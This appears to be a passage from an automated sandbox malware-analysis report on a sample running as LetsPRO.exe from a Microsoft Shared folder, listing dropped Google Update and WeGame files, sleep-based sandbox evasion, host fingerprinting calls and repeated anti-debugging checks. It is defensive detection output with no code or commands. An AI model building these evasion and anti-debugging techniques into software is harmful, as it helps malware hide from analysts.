                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es-419.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\WeGame\adapt_for_imports.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_el.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_de.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\WeGame\Lua51.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-BR.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_th.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_gu.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sr.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\psuser.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\WeGame\WeGame.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lv.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_id.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeAPI coverage: 0.1 %
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeAPI coverage: 8.0 %
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 1848Thread sleep count: 656 > 30Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 2436Thread sleep count: 271 > 30Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 3840Thread sleep count: 460 > 30Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 3840Thread sleep time: -460000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 5532Thread sleep count: 2633 > 30Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 1272Thread sleep count: 3264 > 30Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 1272Thread sleep time: -32640s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 3840Thread sleep count: 1615 > 30Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 3840Thread sleep time: -1615000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 258 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 342 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread sleep count: Count: 2633 delay: -10Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread sleep count: Count: 3264 delay: -10Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C950BF3 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C950BF3
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94CB0B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,5_2_6C94CB0B
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9507B2 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C9507B2
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94C7E5 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,5_2_6C94C7E5
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C917CAD _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C917CAD
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94FE26 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94FE26
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94DFA9 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,5_2_6C94DFA9
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94F945 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94F945
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94DAA8 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,5_2_6C94DAA8
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94F48B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94F48B
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94D56F _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,5_2_6C94D56F
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C951054 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C951054
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94F051 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94F051
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00254318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor,8_2_00254318
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00265490 FindFirstFileExW,8_2_00265490
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0001CBAB FindFirstFileExW,16_2_0001CBAB
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_0012DB25 FindFirstFileExW,30_2_0012DB25
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDB6417 FindFirstFileW,GetLastError,PathStripPathW,PathStripPathW,PathStripPathW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,FindNextFileW,GetLastError,FindClose,30_2_6CDB6417
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC98E75 FindFirstFileW,GetLastError,DeleteFileW,FindNextFileW,GetLastError,FindClose,30_2_6CC98E75
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC98FBC GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,30_2_6CC98FBC
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC9ED9F FindFirstFileW,FindNextFileW,FindClose,30_2_6CC9ED9F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC9AA6F FindFirstFileW,FindNextFileW,FindClose,30_2_6CC9AA6F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCCA66F FindFirstFileW,FindClose,FindNextFileW,30_2_6CCCA66F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC98D3E FindFirstFileW,FindNextFileW,GetLastError,FindClose,30_2_6CC98D3E
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F380F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,4_2_03F380F0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F35430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_03F35430
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: LetsPRO.exe, 00000004.00000002.3261617800.0000000000614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsth
                  Source: GoogleUpdate.exe, 0000001E.00000002.3261720735.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2421148026.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000002.3262321367.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: GoogleUpdate.exe, 0000001E.00000003.2421148026.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000002.3262321367.0000000000B8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Hides threads from debuggers
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebugger
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebugger
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebugger
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebugger
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebugger
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebugger
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebugger
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebugger
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebugger
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread information set: HideFromDebugger
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSystem information queried: KernelDebuggerInformationJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
